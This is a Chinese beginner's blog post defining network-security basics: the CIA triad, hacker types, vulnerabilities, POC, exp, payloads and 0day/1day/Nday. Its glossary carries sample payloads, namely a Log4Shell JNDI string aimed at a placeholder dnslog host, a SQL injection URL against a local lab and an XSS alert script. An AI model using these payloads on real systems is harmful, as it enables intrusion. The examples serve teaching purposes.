什么是网络安全(上)

最新推荐文章于 2023-06-18 12:56:19 发布
最新推荐文章于 2023-06-18 12:56:19 发布
阅读量2.2k 收藏 1
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuangezuishuai/article/details/124738400
版权

首先,小伙伴们很抱歉!本来每周都要进行内容更新,但由于前期考试频繁加上复习停更了一段时间,现在恢复啦!

今天这篇博客继续第一篇网络安全方面的内容,我们来讲讲什么是网路安全。

一、信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

二、其它要素

  1. 抗抵赖性
  2. 可控性
  3. 真实性、时效性、合规性、公平性、可靠性、隐私性

三、五大疆域

网络空间和海、陆、空、天,并称为五大空间或者五大疆域。

http://www.cac.gov.cn/2016-12/27/c_1120195926.htm

四、名词解释

  1. 黑客(hacker):对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
  2. 脚本小子:刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
  3. 白帽子:白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。(常见的工具:360补天、漏洞盒子、CNVD、CNNVD)。
  4. 红帽黑客:有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。
  5. 漏洞:漏洞指的是硬件、软件协议等等存在的安全缺陷。国家信息安全漏洞库http://www.cnnvd.org.cn/web/wz/bzxqById.tag?id=3&mkid=3​​​​​​
  6. POC:能证明漏洞存在的代码。例:${indi:ldap://xxxxxx.dnslog.cn/test}。
  7. exp:执行了这一段利用代码之后,就能够达到攻击的目的(msf)。
  8. payload:攻击载荷。(SQL注入:http://localhost/sqli-labs/less-3/?id=-1')union select 1,1,database() --+)(XSS:<script>alert(1)</script>)(log4j:${indi:ldap://xxxxx.domain.cn/test})
  9. 0day:漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。
  10. 1day:漏洞的POC和EXP已经被公开了,但是很多人还来不及修复,这个叫做1day漏洞。
  11. Nday漏洞:指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。
  12. 漏扫:基于数据库对漏洞进行自动化扫描。

 

瑄哥编程
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网路安全三要素
2301_76161259的博客
04-14 944
在信息安全等级保护工作中,根据信息系统的机密性(Confidentiality)、完整性(Integrity)、可用性(Availability)来划分信息系统的安全等级,三个性质简称CIA。保密性(secrecy),又称机密性,是指个人或团体的信息不为其他不应获得者获得。在电脑中,许多软件包括邮件软件、网络浏览器等,都有保密性相关的设定,用以维护用户资讯的保密性,另外间谍档案或攻击者有可能会造成保密性的问题。
网络安全基础
flat0809的博客
03-06 2587
目录 ·CIA三原则 ·黄金法则(3A原则) ·密码学基础 ·身份认证 ·访问控制 一.CIA三原则 CIA三原则,分别代表C(机密性,Confidentiality),I(完整性,Integrity),A(可用性,Avaliability) 1.机密性 特性:确保用户的某些敏感树蕨,只能被自己看到,即数据的“不可见” 2.完整性 特性:确保用户的数据不能被随意的修改,即数据的”不可改“ 3.可用...
网络安全三要素
zhaoem82的博客
11-11 6331
安全目标 私密性    避免未经授权的完整性    避免未经授权的更改可用性    对授权实体随时可用 安全攻击威胁机密性的攻击        窃听(snooping):在未经授权的情况下...
【信息安全】信息安全三要素CIA
ASDF的博客
04-30 5404
保密性(confidentiality):使信息不泄露给未授权的个人、实体、进程,或不被其利用的特性。 完整性(integrity):数据没有遭受以未授权方式所作的更改或破坏的特性。 可用性(availability):已授权实体一旦需要就可访问和使用的数据和资源的特性。 另: 可控性(controllability):指网络系统和信息在传输范围和存放空间内的可控程度。是对网络系统和信息传输的控制能力特性。(出于国家和机构的利益和社会管理的需要,保证管理者能够对信息实施必要的控制管理,以对抗社会犯罪和外敌侵
浅谈信息安全三要素CIA
Dawn3AM
06-18 891
当你坐在监控室里看监控时,你发现自己只能看到会议室、餐厅、机房、电力控制室的监控,无法看到办公室的监控,原因是办公室的某个坏小子为了摸鱼,将办公室的监控线路用剪刀剪断了,这时候这个监控系统就出现了完整性的问题,即一个系统的信息的完整性被破坏了。显然,为了保护监控系统的完整性,你决定以后将监控线路嵌入墙体内部,这样坏小子如果想物理切断线路,就必须用锤子把墙壁砸开,显然在办公场合这么做会被轻易发现,进而监控系统的完整性得到了保护。
什么是网络安全.pdf
09-20
什么是网络安全.pdf
什么是网络安全以及学习了解网络安全的意义
最新发布
06-06
网络安全
什么是网络安全.doc
07-09
1、什么是网络安全网络安全是一个关系国家安全和主权、社会的稳定、民族文化的继承和发扬的重要 问题。其重要性,正随着全球信息化步伐的加快而变到越来越重要。"家门就是国门", 安全问题刻不容缓。 网络安全是...
什么是网络安全-关于网络安全的一些相关介绍
04-20
关于网络安全的一些相关介绍
2024年我国网络安全发展形势展望
01-09
综上所述,2024年我国网络安全发展的主要趋势包括:网络空间对抗升级、网络安全法制建设强化、数据安全市场深度发展、后量子密码技术研发以及太空网络安全能力提升。面对这些趋势,我们需要在政策、技术、法规等多个...
什么是CIA Triad
08-25 7308
CIA是confidentiality, integrity 和availability三个词的缩写。CIA是系统安全设计的最终目标,常用术语CIA Triad来表述。CIA Triad可以用下图表示: CIA三要素(CIA Triad)的第一项原则是保密性(Confidentiality)。保密性是通过什么样的手段可以保护数据、对象、资源机密性的概念,保密性的目的是组织未授权用户访问数据。加密(encryption)、访问控制(access control)、信息隐写(steganography).
信息安全三要素(CIA):
rihjyy的博客
11-03 1万+
信息安全要素(CIA): 即机密性(Confidentiality)完整性(Intergrity)可用性(Availability) ​ 1.机密性:机密性是指保证信息不被非授权访问,即使非授权用户得到信息也无法知晓信息内容,因而不能使用。他的任务是确保信息不会被未授权用户访问,通常是通过访问控制阻止非授权用户获得机密信息,通过加密变换阻止非授权用户获知信息内容。 ​ 2.完整性:完整性是指维护信息的一致性,即信息在生成、传输、存储和使用过程中不应该发生人为或非人为的非授权篡改。信息的完整性包括两个方面
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 3万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
网络安全五要素
至浊至愚
06-12 1万+
 网络安全五要素: (1)机密性。确保信息不暴露给未经授权的人或应用进程。 (2)完整性。只有得到允许的人或应用进程才能修改数据,并且能够判别出数据是否已被更改。 (3)可用性。只有得到授权的用户在需要时才可以访问数据,即使在网络被攻击时也不能阻碍授权用户对网络的使用。 (4)可控性。能够对授权范围内的信息流向和行为方式进行控制。 (5)可审查行。当网络出现安全问题时,能够提供调查
局域网安全(一)之安全三要素
weixin_33884611的博客
09-05 436
局域网安全安全三要素CIA对于大多数人来说意味着美国中央情报局(Central intelligence agency)。然而,对于安全从业人员来说,CIA是指:保密性(confidentiality)——确保数据处于隐秘状态;完整性(integrity)——仅允许被授权的人变更数据;可用性(availableility)——数据必须随时可以访问,随时准备就绪。这一安全三...
信息安全的 CIA 三要素
天天向尚 的专栏
11-15 3万+
互联网就像一个虚拟的社会。在它诞生的初期,互联网的应用相对简单,使用互联网的人数较少,人们对安全的设计与考虑都比较少。经过几十年的发展和普及,现在互联网已经深入到我们生活的每个方面。从电子邮件,信息搜索,到IP电话,网上购物,订机票车票,买卖股票,银行和退休账号管理,个人信息管理,博客与社交网。。。互联网已经同现代的社会生活紧密交织在一起,使人们更容易地获得各种信息,跨越地域局限同世界上的人们交往
信息安全三要素CIA
sapphire7的博客
07-18 3万+
保密性(Confidentiality)、完整性(Integrity)和可用性(Availability)是信息安全的三大基石。 1)保密性:保证信息不泄露给未经授权的用户。 2)完整性:保证信息从真实的发信者传送到真实的收信者手中,传送过程中没有被非法用户添加、删除、替换等。 3)可用性:保证授权用户能对数据进行及时可靠的访问。 除CIA外,还有一些属性也是要求达到的,如可控性(Cont...
计算机网络——3A安全认证
Boom!脑洞大爆炸的博客
06-20 1万+
由浅入深认识3A认证体系
网络安全与认证技术-总复习
m0_50967960的博客
12-27 7721
1,绪论 网络安全的基本概念 定义 ​ CIA三要素:保护、防止、保证。 机密性、完整性、可用性 ​ 广义上讲:保密性、完整性、可用性、真实性、可控性 ​ 两个方面:技术、管理 ​ ISO对网络安全的定义:网络系统的软件、硬件以及系统中存储和传输的数据受到保护,不因偶然的或者恶意的 原因而遭到破坏、更改、泄露,网络系统连续可靠正常地运行,网络服务不中断 属性 机密性、完整性、可用性、可控性、真实性 模型 ​ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KxuFd0UT-16
什么是网络安全靶场?
05-05
网络安全靶场是一个模拟真实网络环境的虚拟或物理平台,用于进行网络安全攻防演练和实验。它提供了一个安全的环境,让安全专业人员可以在其中模拟各种攻击和防御场景,以测试和评估网络的安全性,并提供相应的解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值